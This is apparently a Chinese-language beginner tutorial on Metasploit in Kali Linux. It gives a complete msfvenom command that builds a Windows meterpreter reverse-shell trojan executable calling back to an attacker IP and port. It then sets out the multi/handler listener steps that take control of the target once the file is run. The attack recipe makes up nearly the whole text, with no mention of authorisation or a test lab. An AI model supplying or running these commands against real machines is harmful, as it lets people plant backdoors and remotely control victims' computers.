metasploit使用教程?Metasploit是kali系統自帶的漏洞滲透工具，功能涵蓋漏洞掃描、漏洞測試、漏洞攻擊、後滲透攻擊、腳本生成等模塊，簡單易用，容易上手，本文旨在抛開複雜難懂的背後理論知識，教給讀者一個易于上手操作的軟件使用方法，現在小編就來說說關于metasploit使用教程?下面内容希望能幫助到你，我們來一起看看吧!

metasploit使用教程

Metasploit是kali系統自帶的漏洞滲透工具，功能涵蓋漏洞掃描、漏洞測試、漏洞攻擊、後滲透攻擊、腳本生成等模塊，簡單易用，容易上手，本文旨在抛開複雜難懂的背後理論知識，教給讀者一個易于上手操作的軟件使用方法。

一、生成腳本

1、Metasploit生成腳本的命令為msfvenom，假定本機ip為10.10.10.61，本機連接端口為4444

在kali命令行界面輸入：msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe -o ./vir.exe LHOST=10.10.10.61 LPORT=4444

以上命令可生成用于windows x86平台的木馬腳本文件，後綴名為exe，将文件拷貝到目标機并運行，在攻擊機監聽狀态會返回一個shell，在此shell下輸入命令即可控制目标機，各項參數解釋如下：

-p 指定payload，即在目标機上執行的操作

-a 指定架構

--platform 指定平台

-f 指定輸出格式

-o 指定輸出路徑

LHOST 指定回連IP，即攻擊機地址

LPORT 指定回連端口，即攻擊機端口

以上參數可進行更改，在msf狀态下輸入msfvenom -l payloads/formats/platforms可查看支持的payloads、formats、platforms等。

二、設置監聽狀态

在目标機上運行以上生成的文件後，目标機會試圖連接ip地址為10.10.10.61，端口4444的主機，因此，需要在攻擊機上設置監聽狀态，以接受來自目标機的連接。

在kali的命令窗口輸入msfconsole，等待片刻會進入msf的命令界面。依次輸入以下命令：

use exploit/multi/handler #使用handle模塊

set payload windows/meterpreter/reverse_tcp #設置payload

set LHOST 10.10.10.61 #設置本機ip

set LPORT 4444 #設置本機端口

run #開始監聽

三、目标機連接到攻擊機

在目标機運行exe文件後，攻擊機會回彈一個meterpreter，在這個meterpreter下就可以用各種命令操縱目标機了。

下一節：meterpreter用法